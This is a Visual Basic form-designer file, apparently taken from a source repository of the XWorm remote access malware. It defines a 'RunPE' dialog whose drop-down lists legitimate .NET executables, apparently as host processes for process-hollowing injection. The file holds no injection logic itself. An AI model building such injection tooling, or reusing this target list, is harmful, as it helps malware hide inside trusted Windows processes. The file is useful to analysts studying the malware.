Files
XWorm-6.5-Source/XWorm/Forms/RunPE.Designer.vb
T
2026-08-27 11:22:34 -06:00

177 lines
11 KiB
VB.net

<Global.Microsoft.VisualBasic.CompilerServices.DesignerGenerated()> _
Partial Class RunPE
Inherits System.Windows.Forms.Form
'Form overrides dispose to clean up the component list.
<System.Diagnostics.DebuggerNonUserCode()> _
Protected Overrides Sub Dispose(ByVal disposing As Boolean)
Try
If disposing AndAlso components IsNot Nothing Then
components.Dispose()
End If
Finally
MyBase.Dispose(disposing)
End Try
End Sub
'Required by the Windows Form Designer
Private components As System.ComponentModel.IContainer
'NOTE: The following procedure is required by the Windows Form Designer
'It can be modified using the Windows Form Designer.
'Do not modify it using the code editor.
<System.Diagnostics.DebuggerStepThrough()> _
Private Sub InitializeComponent()
Dim resources As System.ComponentModel.ComponentResourceManager = New System.ComponentModel.ComponentResourceManager(GetType(RunPE))
Label1 = New System.Windows.Forms.Label()
Label2 = New System.Windows.Forms.Label()
Guna2ComboBox2 = New Guna.UI2.WinForms.Guna2ComboBox()
Guna2ComboBox1 = New Guna.UI2.WinForms.Guna2ComboBox()
Guna2GradientButton1 = New Guna.UI2.WinForms.Guna2GradientButton()
Guna2GradientButton2 = New Guna.UI2.WinForms.Guna2GradientButton()
Guna2GradientButton3 = New Guna.UI2.WinForms.Guna2GradientButton()
SuspendLayout()
'
'Label1
'
Label1.AutoSize = True
Label1.ForeColor = System.Drawing.Color.Black
Label1.Location = New System.Drawing.Point(16, 33)
Label1.Name = "Label1"
Label1.Size = New System.Drawing.Size(37, 13)
Label1.TabIndex = 2
Label1.Text = ".NET :"
'
'Label2
'
Label2.AutoSize = True
Label2.ForeColor = System.Drawing.Color.Black
Label2.Location = New System.Drawing.Point(23, 60)
Label2.Name = "Label2"
Label2.Size = New System.Drawing.Size(30, 13)
Label2.TabIndex = 3
Label2.Text = "File :"
'
'Guna2ComboBox2
'
Guna2ComboBox2.BackColor = System.Drawing.Color.Transparent
Guna2ComboBox2.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer))
Guna2ComboBox2.BorderRadius = 3
Guna2ComboBox2.DrawMode = System.Windows.Forms.DrawMode.OwnerDrawFixed
Guna2ComboBox2.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Guna2ComboBox2.FocusedColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer))
Guna2ComboBox2.FocusedState.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer))
Guna2ComboBox2.Font = New System.Drawing.Font("Segoe UI", 8.25!)
Guna2ComboBox2.ForeColor = System.Drawing.Color.Black
Guna2ComboBox2.ItemHeight = 15
Guna2ComboBox2.Items.AddRange(New Object() {"aspnet_compiler.exe", "RegAsm.exe", "MSBuild.exe", "RegSvcs.exe", "vbc.exe"})
Guna2ComboBox2.Location = New System.Drawing.Point(59, 57)
Guna2ComboBox2.Name = "Guna2ComboBox2"
Guna2ComboBox2.Size = New System.Drawing.Size(176, 21)
Guna2ComboBox2.TabIndex = 92
'
'Guna2ComboBox1
'
Guna2ComboBox1.BackColor = System.Drawing.Color.Transparent
Guna2ComboBox1.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer))
Guna2ComboBox1.BorderRadius = 3
Guna2ComboBox1.DrawMode = System.Windows.Forms.DrawMode.OwnerDrawFixed
Guna2ComboBox1.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Guna2ComboBox1.FocusedColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer))
Guna2ComboBox1.FocusedState.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer))
Guna2ComboBox1.Font = New System.Drawing.Font("Segoe UI", 8.25!)
Guna2ComboBox1.ForeColor = System.Drawing.Color.Black
Guna2ComboBox1.ItemHeight = 15
Guna2ComboBox1.Items.AddRange(New Object() {"v4.0", "v2.0"})
Guna2ComboBox1.Location = New System.Drawing.Point(59, 30)
Guna2ComboBox1.Name = "Guna2ComboBox1"
Guna2ComboBox1.Size = New System.Drawing.Size(176, 21)
Guna2ComboBox1.TabIndex = 93
'
'Guna2GradientButton1
'
Guna2GradientButton1.BorderRadius = 4
Guna2GradientButton1.DisabledState.BorderColor = System.Drawing.Color.DarkGray
Guna2GradientButton1.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray
Guna2GradientButton1.DisabledState.FillColor = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer))
Guna2GradientButton1.DisabledState.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer))
Guna2GradientButton1.DisabledState.ForeColor = System.Drawing.Color.FromArgb(CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer))
Guna2GradientButton1.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer))
Guna2GradientButton1.Font = New System.Drawing.Font("Segoe UI", 9.0!)
Guna2GradientButton1.ForeColor = System.Drawing.Color.White
Guna2GradientButton1.ImageSize = New System.Drawing.Size(17, 17)
Guna2GradientButton1.Location = New System.Drawing.Point(59, 84)
Guna2GradientButton1.Name = "Guna2GradientButton1"
Guna2GradientButton1.Size = New System.Drawing.Size(176, 24)
Guna2GradientButton1.TabIndex = 94
Guna2GradientButton1.Text = "Select"
'
'Guna2GradientButton2
'
Guna2GradientButton2.BorderRadius = 4
Guna2GradientButton2.DisabledState.BorderColor = System.Drawing.Color.DarkGray
Guna2GradientButton2.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray
Guna2GradientButton2.DisabledState.FillColor = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer))
Guna2GradientButton2.DisabledState.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer))
Guna2GradientButton2.DisabledState.ForeColor = System.Drawing.Color.FromArgb(CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer))
Guna2GradientButton2.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer))
Guna2GradientButton2.Font = New System.Drawing.Font("Segoe UI", 9.0!)
Guna2GradientButton2.ForeColor = System.Drawing.Color.White
Guna2GradientButton2.ImageSize = New System.Drawing.Size(17, 17)
Guna2GradientButton2.Location = New System.Drawing.Point(12, 143)
Guna2GradientButton2.Name = "Guna2GradientButton2"
Guna2GradientButton2.Size = New System.Drawing.Size(84, 24)
Guna2GradientButton2.TabIndex = 95
Guna2GradientButton2.Text = "Ok"
'
'Guna2GradientButton3
'
Guna2GradientButton3.BorderRadius = 4
Guna2GradientButton3.DisabledState.BorderColor = System.Drawing.Color.DarkGray
Guna2GradientButton3.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray
Guna2GradientButton3.DisabledState.FillColor = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer))
Guna2GradientButton3.DisabledState.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer))
Guna2GradientButton3.DisabledState.ForeColor = System.Drawing.Color.FromArgb(CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer))
Guna2GradientButton3.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer))
Guna2GradientButton3.Font = New System.Drawing.Font("Segoe UI", 9.0!)
Guna2GradientButton3.ForeColor = System.Drawing.Color.White
Guna2GradientButton3.ImageSize = New System.Drawing.Size(17, 17)
Guna2GradientButton3.Location = New System.Drawing.Point(163, 143)
Guna2GradientButton3.Name = "Guna2GradientButton3"
Guna2GradientButton3.Size = New System.Drawing.Size(84, 24)
Guna2GradientButton3.TabIndex = 96
Guna2GradientButton3.Text = "Close"
'
'RunPE
'
AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!)
AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font
AutoSizeMode = System.Windows.Forms.AutoSizeMode.GrowAndShrink
BackColor = System.Drawing.Color.White
ClientSize = New System.Drawing.Size(259, 179)
Controls.Add(Guna2GradientButton3)
Controls.Add(Guna2GradientButton2)
Controls.Add(Guna2GradientButton1)
Controls.Add(Guna2ComboBox1)
Controls.Add(Guna2ComboBox2)
Controls.Add(Label2)
Controls.Add(Label1)
Icon = CType(resources.GetObject("$this.Icon"), System.Drawing.Icon)
MaximizeBox = False
MinimizeBox = False
Name = "RunPE"
SizeGripStyle = System.Windows.Forms.SizeGripStyle.Hide
Text = "RunPE"
ResumeLayout(False)
PerformLayout()
End Sub
Friend WithEvents Label1 As Label
Friend WithEvents Label2 As Label
Friend WithEvents Guna2ComboBox2 As Guna.UI2.WinForms.Guna2ComboBox
Friend WithEvents Guna2ComboBox1 As Guna.UI2.WinForms.Guna2ComboBox
Friend WithEvents Guna2GradientButton1 As Guna.UI2.WinForms.Guna2GradientButton
Friend WithEvents Guna2GradientButton2 As Guna.UI2.WinForms.Guna2GradientButton
Friend WithEvents Guna2GradientButton3 As Guna.UI2.WinForms.Guna2GradientButton
End Class